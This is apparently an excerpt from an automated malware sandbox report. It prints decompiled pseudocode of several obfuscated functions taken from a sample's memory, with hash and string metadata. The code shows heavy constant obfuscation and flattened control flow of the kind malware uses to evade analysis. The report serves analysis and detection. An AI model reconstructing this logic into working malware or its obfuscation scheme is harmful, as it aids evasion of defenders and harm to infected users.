                                                      				_v1680 = _v1680 + 0xaf06;
                                                      				_v1680 = _v1680 ^ 0x022411a2;
                                                      				_v1644 = 0x3f39;
                                                      				_v1644 = _v1644 + 0xffff5bb9;
                                                      				_v1644 = _v1644 ^ 0xffffc632;
                                                      				_v1692 = 0xc5f9;
                                                      				_v1692 = _v1692 ^ 0xaafe79bc;
                                                      				_v1692 = _v1692 >> 0xf;
                                                      				_v1692 = _v1692 ^ 0x00013e0d;
                                                      				_v1740 = 0x58ed;
                                                      				_v1740 = _v1740 + 0xffff3fce;
                                                      				_v1740 = _v1740 * 0x34;
                                                      				_v1740 = _v1740 * 0x49;
                                                      				_v1740 = _v1740 ^ 0xfa04971a;
                                                      				_v1696 = 0xcc7a;
                                                      				_v1696 = _v1696 >> 4;
                                                      				_v1696 = _v1696 << 1;
                                                      				_v1696 = _v1696 ^ 0x00000d26;
                                                      				_v1732 = 0xc33a;
                                                      				_v1732 = _v1732 | 0xb66c57ae;
                                                      				_v1732 = _v1732 >> 5;
                                                      				_v1732 = _v1732 * 0x56;
                                                      				_v1732 = _v1732 ^ 0xea449beb;
                                                      				_v1712 = 0xdae0;
                                                      				_v1712 = _v1712 >> 0xc;
                                                      				_v1712 = _v1712 ^ 0xc13d67df;
                                                      				_v1712 = _v1712 ^ 0xc13d455b;
                                                      				_v1716 = 0x5478;
                                                      				_v1716 = _v1716 | 0xa382055d;
                                                      				_v1716 = _v1716 * 0x26;
                                                      				_v1716 = _v1716 ^ 0x4558c259;
                                                      				_v1720 = 0xeafc;
                                                      				_v1720 = _v1720 + 0xffff5250;
                                                      				_v1720 = _v1720 ^ 0x4a0f2ed9;
                                                      				_v1720 = _v1720 ^ 0x4a0f1f8c;
                                                      				_v1664 = 0x8e28;
                                                      				_v1664 = _v1664 ^ 0x7b061f8d;
                                                      				_v1664 = _v1664 + 0xffffa0ec;
                                                      				_v1664 = _v1664 ^ 0x7b062de0;
                                                      				_v1724 = 0xce31;
                                                      				_v1724 = _v1724 << 0xe;
                                                      				_v1724 = _v1724 << 7;
                                                      				_v1724 = _v1724 << 5;
                                                      				_v1724 = _v1724 ^ 0xc4004273;
                                                      				_v1704 = 0xa554;
                                                      				_v1704 = _v1704 << 5;
                                                      				_v1704 = _v1704 * 0x35;
                                                      				_v1704 = _v1704 ^ 0x04475614;
                                                      				_v1660 = 0xb9dc;
                                                      				_v1660 = _v1660 + 0x9e03;
                                                      				_v1660 = _v1660 ^ 0x00011a8b;
                                                      				_v1652 = 0xf227;
                                                      				_t399 = _v1660;
                                                      				_v1652 = _v1652 / _t404;
                                                      				_v1652 = _v1652 ^ 0x00007d1f;
                                                      				while(1) {
                                                      					L1:
                                                      					_t389 = 0x2e;
                                                      					L2:
                                                      					while(_t354 != 0x2ecc014) {
                                                      						if(_t354 == 0xf8b22d1) {
                                                      							__eflags = _v1632 & _v1672;
                                                      							if(__eflags == 0) {
                                                      								_t340 = _a8( &_v1632, _a20);
                                                      								asm("sbb ecx, ecx");
                                                      								_t358 =  ~_t340 & 0x1c386f3a;
                                                      								L13:
                                                      								_t354 = _t358 + 0x2ecc014;
                                                      								while(1) {
                                                      									L1:
                                                      									_t389 = 0x2e;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							__eflags = _v1588 - _t389;
                                                      							if(_v1588 != _t389) {
                                                      								L20:
                                                      								__eflags = _a16;
                                                      								if(__eflags != 0) {
                                                      									_push(_v1760);
                                                      									_t348 = E0024889D(0x24c0b0, _v1756, __eflags);
                                                      									_pop(_t360);
                                                      									E0023C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
                                                      									E00242B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
                                                      									_t409 = _t409 + 0x30;
                                                      									_t346 = E00242025(_v1732, _t348, _v1712, _v1716);
                                                      									_t389 = 0x2e;
                                                      								}
                                                      								L19:
                                                      								_t354 = 0x1f252f4e;
                                                      								continue;
                                                      							}
                                                      							__eflags = _v1586;
                                                      							if(__eflags == 0) {
                                                      								goto L19;
                                                      							}
                                                      							__eflags = _v1586 - _t389;
                                                      							if(_v1586 != _t389) {
                                                      								goto L20;
                                                      							}
                                                      							__eflags = _v1584;
                                                      							if(__eflags != 0) {
                                                      								goto L20;
                                                      							}
                                                      							goto L19;
                                                      						}
                                                      						if(_t354 == 0x1f252f4e) {
                                                      							_t342 = E0023595A(_v1720, _t399,  &_v1632, _v1664);
                                                      							asm("sbb ecx, ecx");
                                                      							_t358 =  ~_t342 & 0x0c9e62bd;
                                                      							__eflags = _t358;
                                                      							goto L13;
                                                      						}
                                                      						if(_t354 == 0x21983c19) {
                                                      							_push(_v1684);
                                                      							E00247BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0024889D(0x24c090, _v1736, __eflags));
                                                      							_t346 = E00242025(_v1744, _t343, _v1636, _v1668);
                                                      							_t409 = _t409 + 0x20;
                                                      							_t354 = 0x3298743a;
                                                      							while(1) {
                                                      								L1:
                                                      								_t389 = 0x2e;
                                                      								goto L2;
                                                      							}
                                                      						}
                                                      						if(_t354 == 0x3181563a) {
                                                      							_t354 = 0x21983c19;
                                                      							continue;
                                                      						}
                                                      						if(_t354 != 0x3298743a) {
                                                      							L24:
                                                      							__eflags = _t354 - 0x2a8aa181;
                                                      							if(__eflags != 0) {
                                                      								continue;
                                                      							}
                                                      							L25:
                                                      							return _t346;
                                                      						}
                                                      						_t346 = E0023109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
                                                      						_t399 = _t346;
                                                      						_t409 = _t409 + 0x10;
                                                      						if(_t346 == 0xffffffff) {
                                                      							goto L25;
                                                      						}
                                                      						_t354 = 0xf8b22d1;
                                                      						goto L1;
                                                      					}
                                                      					E00231B5C(_v1724, _v1704, _v1660, _t399, _v1652);
                                                      					_t409 = _t409 + 0xc;
                                                      					_t354 = 0x2a8aa181;
                                                      					_t389 = 0x2e;
                                                      					goto L24;
                                                      				}
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
                                                      • API String ID: 0-983689062
                                                      • Opcode ID: a04f91dab14ab90d741565bfa905542eef083a9e8bb172c6fecf340adaaa556d
                                                      • Instruction ID: abad22107c5dde3f1454ceb37df59a0331a14e48cd6fca8fa813317af5d102af
                                                      • Opcode Fuzzy Hash: a04f91dab14ab90d741565bfa905542eef083a9e8bb172c6fecf340adaaa556d
                                                      • Instruction Fuzzy Hash: 09F121715183819FD368CF61C549A5FBBF1FBC4308F508A1DF29A862A0D7B98A59CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 99%
                                                      			E002388E5(intOrPtr __ecx, intOrPtr* __edx) {
                                                      				intOrPtr _t325;
                                                      				short* _t331;
                                                      				signed int _t340;
                                                      				signed int _t341;
                                                      				signed int _t342;
                                                      				signed int _t343;
                                                      				short _t373;
                                                      				void* _t376;
                                                      				intOrPtr* _t380;
                                                      				void* _t382;
                                                      
                                                      				 *(_t382 + 8) = 0xaa86;
                                                      				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
                                                      				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
                                                      				 *(_t382 + 8) =  *(_t382 + 8) << 6;
                                                      				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
                                                      				 *(_t382 + 0x64) = 0xdd5d;
                                                      				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
                                                      				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
                                                      				 *(_t382 + 0x74) = 0x57af;
                                                      				_t380 = __edx;
                                                      				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
                                                      				_t373 = 0;
                                                      				_t340 = 5;
                                                      				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
                                                      				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
                                                      				_t376 = 0x1f5a6ea2;
                                                      				 *(_t382 + 0x68) = 0xf929;
                                                      				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
                                                      				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
                                                      				 *(_t382 + 0x74) = 0x8254;
                                                      				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
                                                      				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
                                                      				 *(_t382 + 0x48) = 0x274c;
                                                      				_t341 = 0x4c;
                                                      				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
                                                      				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
                                                      				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
                                                      				 *(_t382 + 0x7c) = 0x6684;
                                                      				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
                                                      				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
                                                      				 *(_t382 + 0x40) = 0x1902;
                                                      				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
                                                      				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
                                                      				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
                                                      				 *(_t382 + 0x6c) = 0xb89b;
                                                      				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
                                                      				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
                                                      				 *(_t382 + 0x14) = 0x3892;
                                                      				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
                                                      				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
                                                      				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
                                                      				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
                                                      				 *(_t382 + 0x28) = 0xad3d;
                                                      				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
                                                      				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
                                                      				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
                                                      				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
                                                      				 *(_t382 + 0x58) = 0xde2;
                                                      				_t342 = 0x39;
                                                      				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
                                                      				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
                                                      				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
                                                      				 *(_t382 + 0x1c) = 0xba82;
                                                      				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
                                                      				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
                                                      				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
                                                      				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
                                                      				 *(_t382 + 0x40) = 0xa3d9;
                                                      				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
                                                      				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
                                                      				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
                                                      				 *(_t382 + 0x5c) = 0xecab;
                                                      				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
                                                      				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
                                                      				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
                                                      				 *(_t382 + 0x80) = 0x1387;
                                                      				_t343 = 0x2a;
                                                      				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
                                                      				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
                                                      				 *(_t382 + 0x4c) = 0x7ada;
                                                      				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
                                                      				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
                                                      				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
                                                      				 *(_t382 + 0x90) = 0x1591;
                                                      				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
                                                      				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
                                                      				 *(_t382 + 0x2c) = 0x3f89;
                                                      				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
                                                      				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
                                                      				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
                                                      				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
                                                      				 *(_t382 + 0x98) = 0x7441;
                                                      				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
                                                      				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
                                                      				 *(_t382 + 0x48) = 0x7f1e;
                                                      				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
                                                      				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
                                                      				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
                                                      				 *(_t382 + 0x8c) = 0x831c;
                                                      				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
                                                      				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
                                                      				 *(_t382 + 0x30) = 0x92b6;
                                                      				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
                                                      				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
                                                      				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
                                                      				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
                                                      				 *(_t382 + 0x28) = 0x1d89;
                                                      				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
                                                      				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
                                                      				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
                                                      				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
                                                      				 *(_t382 + 0x58) = 0x126d;
                                                      				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
                                                      				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
                                                      				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
                                                      				 *(_t382 + 0x7c) = 0x1a69;
                                                      				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
                                                      				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
                                                      				 *(_t382 + 0x20) = 0xff0b;
                                                      				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
                                                      				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
                                                      				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
                                                      				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
                                                      				 *(_t382 + 0x6c) = 0xe12c;
                                                      				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
                                                      				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
                                                      				 *(_t382 + 0x34) = 0xd574;
                                                      				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
                                                      				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
                                                      				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
                                                      				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
                                                      				 *(_t382 + 0x88) = 0x5832;
                                                      				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
                                                      				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
                                                      				 *(_t382 + 0x50) = 0x55a1;
                                                      				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
                                                      				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
                                                      				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
                                                      				 *(_t382 + 0x14) = 0xc073;
                                                      				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
                                                      				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
                                                      				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
                                                      				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
                                                      				 *(_t382 + 0x94) = 0xf1be;
                                                      				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
                                                      				_t344 = 0xa;
                                                      				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
                                                      				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
                                                      				 *(_t382 + 0x60) = 0x96ef;
                                                      				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
                                                      				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
                                                      				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
                                                      				 *(_t382 + 0x38) = 0xec0c;
                                                      				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
                                                      				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
                                                      				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
                                                      				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
                                                      				do {
                                                      					while(_t376 != 0x3ac0a14) {
                                                      						if(_t376 == 0x7fec1df) {
                                                      							_t344 = _t382 + 0x2ac;
                                                      							E00240D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
                                                      							_t382 = _t382 + 0xc;
                                                      							_t376 = 0x12c07630;
                                                      							continue;
                                                      						} else {
                                                      							if(_t376 == 0x12c07630) {
                                                      								_push( *(_t382 + 0x1c));
                                                      								E002329E3(_t382 + 0x2b0, 0x104, E0024889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
                                                      								_t344 =  *(_t382 + 0x5c);
                                                      								E00242025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
                                                      								_t382 = _t382 + 0x30;
                                                      								_t376 = 0x3ac0a14;
                                                      								continue;
                                                      							} else {
                                                      								if(_t376 == 0x1f5a6ea2) {
                                                      									_t376 = 0x2b635c32;
                                                      									continue;
                                                      								} else {
                                                      									if(_t376 == 0x2b635c32) {
                                                      										E00243E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
                                                      										_t331 = E002328CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
                                                      										_t382 = _t382 + 0xc;
                                                      										_t376 = 0x7fec1df;
                                                      										_t344 = 0;
                                                      										 *_t331 = 0;
                                                      										continue;
                                                      									} else {
                                                      										if(_t376 == 0x2c9ad714) {
                                                      											E00244F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
                                                      										} else {
                                                      											if(_t376 != 0x33ecfade) {
                                                      												goto L16;
                                                      											} else {
                                                      												_t263 = _t380 + 4; // 0xedb0bf04
                                                      												E00246CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
                                                      												_t382 = _t382 + 0x20;
                                                      												_t344 = 1;
                                                      												_t376 = 0x2c9ad714;
                                                      												_t373 =  !=  ? 1 : _t373;
                                                      												continue;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L19:
                                                      						return _t373;
                                                      					}
                                                      					_t325 = E0023B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
                                                      					_t337 = _t325;
                                                      					_t382 = _t382 + 0x30;
                                                      					__eflags = _t325 - 0xffffffff;
                                                      					if(__eflags == 0) {
                                                      						_t376 = 0x18af80d5;
                                                      						goto L16;
                                                      					} else {
                                                      						_t376 = 0x33ecfade;
                                                      						continue;
                                                      					}
                                                      					goto L19;
                                                      					L16:
                                                      					__eflags = _t376 - 0x18af80d5;
                                                      				} while (__eflags != 0);
                                                      				goto L19;
                                                      			}














                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
                                                      • API String ID: 2962429428-1096774584
                                                      • Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                                      • Instruction ID: 3597c8509887a9e209f02878ed3091ff690987658e6ee324d715a179228464f9
                                                      • Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                                      • Instruction Fuzzy Hash: E9F11FB25083809FD368CF65C48A65BFBE1BBC4748F10891DF1DA962A0C7B98959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E002426F5(intOrPtr __ecx, intOrPtr* __edx) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				intOrPtr _t199;
                                                      				intOrPtr _t201;
                                                      				void* _t202;
                                                      				intOrPtr _t204;
                                                      				intOrPtr _t208;
                                                      				intOrPtr _t209;
                                                      				intOrPtr* _t210;
                                                      				signed int _t212;
                                                      				signed int _t213;
                                                      				signed int _t214;
                                                      				signed int _t215;
                                                      				void* _t216;
                                                      				void* _t224;
                                                      				void* _t237;
                                                      				intOrPtr _t241;
                                                      				void* _t242;
                                                      				intOrPtr _t246;
                                                      				signed int* _t247;
                                                      
                                                      				_t247 =  &_v88;
                                                      				_v12 = 0x29be25;
                                                      				_v8 = 0x714c58;
                                                      				_t241 = 0;
                                                      				_t210 = __edx;
                                                      				_v4 = 0;
                                                      				_v28 = 0x1199;
                                                      				_t246 = __ecx;
                                                      				_v28 = _v28 + 0xffffe920;
                                                      				_t242 = 0x2efb68f6;
                                                      				_v28 = _v28 ^ 0xffffad72;
                                                      				_v32 = 0x5bb2;
                                                      				_t212 = 0x22;
                                                      				_v32 = _v32 / _t212;
                                                      				_v32 = _v32 ^ 0x00002aec;
                                                      				_v56 = 0xeb34;
                                                      				_t213 = 0x1b;
                                                      				_v56 = _v56 * 0x6a;
                                                      				_v56 = _v56 + 0x2965;
                                                      				_v56 = _v56 ^ 0x0061feda;
                                                      				_v84 = 0xfe4e;
                                                      				_v84 = _v84 + 0xd2a6;
                                                      				_v84 = _v84 >> 3;
                                                      				_v84 = _v84 | 0x3d0bc2c6;
                                                      				_v84 = _v84 ^ 0x3d0bc81e;
                                                      				_v20 = 0x5db0;
                                                      				_v20 = _v20 + 0xffffd438;
                                                      				_v20 = _v20 ^ 0x00005602;
                                                      				_v24 = 0xa932;
                                                      				_v24 = _v24 * 0x1f;
                                                      				_v24 = _v24 ^ 0x00145068;
                                                      				_v88 = 0xc29f;
                                                      				_v88 = _v88 * 0x34;
                                                      				_v88 = _v88 ^ 0xcbbf1de0;
                                                      				_v88 = _v88 + 0x67bb;
                                                      				_v88 = _v88 ^ 0xcb98f8b4;
                                                      				_v36 = 0x7c84;
                                                      				_v36 = _v36 + 0x6da7;
                                                      				_v36 = _v36 ^ 0x0000df84;
                                                      				_v60 = 0xf0d8;
                                                      				_v60 = _v60 + 0xffffcb07;
                                                      				_v60 = _v60 * 0x50;
                                                      				_v60 = _v60 ^ 0x003a95e0;
                                                      				_v44 = 0x6681;
                                                      				_v44 = _v44 + 0xffff19d2;
                                                      				_v44 = _v44 / _t213;
                                                      				_v44 = _v44 ^ 0x097b3a7d;
                                                      				_v16 = 0x94d;
                                                      				_v16 = _v16 + 0x4187;
                                                      				_v16 = _v16 ^ 0x00007836;
                                                      				_v48 = 0x21e9;
                                                      				_v48 = _v48 ^ 0x3c92a0ae;
                                                      				_v48 = _v48 + 0xf596;
                                                      				_v48 = _v48 ^ 0x3c9366ad;
                                                      				_v52 = 0x4a04;
                                                      				_v52 = _v52 * 0x54;
                                                      				_v52 = _v52 ^ 0x56a39f58;
                                                      				_v52 = _v52 ^ 0x56bbe121;
                                                      				_v80 = 0x166f;
                                                      				_v80 = _v80 ^ 0x3bc38db2;
                                                      				_v80 = _v80 << 0xd;
                                                      				_v80 = _v80 | 0x5d8ccce3;
                                                      				_v80 = _v80 ^ 0x7fffd756;
                                                      				_v76 = 0xd2e;
                                                      				_t214 = 6;
                                                      				_v76 = _v76 / _t214;
                                                      				_t215 = 0x59;
                                                      				_t237 = 0xdd7d922;
                                                      				_v76 = _v76 / _t215;
                                                      				_v76 = _v76 ^ 0xb1a59fe6;
                                                      				_v76 = _v76 ^ 0xb1a5c97b;
                                                      				_v40 = 0x2ae1;
                                                      				_v40 = _v40 >> 6;
                                                      				_v40 = _v40 << 2;
                                                      				_v40 = _v40 ^ 0x0000341b;
                                                      				_v64 = 0x37cd;
                                                      				_v64 = _v64 + 0xffff3540;
                                                      				_v64 = _v64 << 1;
                                                      				_v64 = _v64 | 0x66261fef;
                                                      				_v64 = _v64 ^ 0xfffeb931;
                                                      				_v68 = 0x9ed9;
                                                      				_v68 = _v68 + 0xad09;
                                                      				_v68 = _v68 ^ 0xfd9e5c2b;
                                                      				_v68 = _v68 >> 4;
                                                      				_v68 = _v68 ^ 0x0fd99075;
                                                      				_v72 = 0x1a2d;
                                                      				_v72 = _v72 + 0xc4a4;
                                                      				_v72 = _v72 << 6;
                                                      				_v72 = _v72 * 0x59;
                                                      				_v72 = _v72 ^ 0x135ddffd;
                                                      				while(1) {
                                                      					L1:
                                                      					_t216 = 0x2c1c6573;
                                                      					while(_t242 != 0x6072d1c) {
                                                      						if(_t242 == _t237) {
                                                      							_push(_t216);
                                                      							_t199 = E00231132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00232A30);
                                                      							_t247 =  &(_t247[9]);
                                                      							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
                                                      							__eflags = _t199;
                                                      							_t216 = 0x2c1c6573;
                                                      							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
                                                      							L13:
                                                      							_t237 = 0xdd7d922;
                                                      							continue;
                                                      						}
                                                      						if(_t242 == 0xe9e2879) {
                                                      							_push(_v24);
                                                      							_t201 = E00246DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
                                                      							_t247 =  &(_t247[5]);
                                                      							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
                                                      							__eflags = _t201;
                                                      							_t202 = 0x303a6ade;
                                                      							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
                                                      							L12:
                                                      							_t216 = 0x2c1c6573;
                                                      							goto L13;
                                                      						}
                                                      						if(_t242 == 0x28cfd81a) {
                                                      							return E0023F536(_v64, _v68, _v72, _t241);
                                                      						}
                                                      						if(_t242 == _t216) {
                                                      							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
                                                      							_t204 =  *0x24ca24; // 0x0
                                                      							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
                                                      							 *0x24ca24 = _t241;
                                                      							return _t204;
                                                      						}
                                                      						if(_t242 != 0x2efb68f6) {
                                                      							if(_t242 != _t202) {
                                                      								L17:
                                                      								__eflags = _t242 - 0x35b12720;
